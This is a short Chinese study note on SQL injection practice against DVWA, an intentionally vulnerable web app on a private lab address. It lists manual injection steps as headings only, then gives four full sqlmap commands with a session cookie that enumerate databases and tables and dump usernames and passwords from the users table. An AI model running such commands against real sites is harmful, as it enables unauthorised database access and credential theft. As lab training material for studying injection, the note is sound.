一、手注
1.判断是否存在SQL注入漏洞及类型
2.求判断列数
3.求显示位
3.表库名,用户名等信息
4.爆表名
5.爆列名
6.拖库
7.结果验证
二、sqlmap注入
1.查找数据库用户,数据库库名
语句:
sqlmap -u "http://192.168.126.147/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=otmt2ik3go232pj7gbfnlni116" --banner --dbs --users
2.爆表
sqlmap -u "http://192.168.126.147/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=otmt2ik3go232pj7gbfnlni116" -D dvwa --tables
3.爆列名
sqlmap -u "http://192.168.126.147/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=otmt2ik3go232pj7gbfnlni116" -D dvwa -T users --colums
4.爆指定表中信息
sqlmap -u "http://192.168.126.147/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=otmt2ik3go232pj7gbfnlni116" -D dvwa -T users -C "user,password,user_id" --dump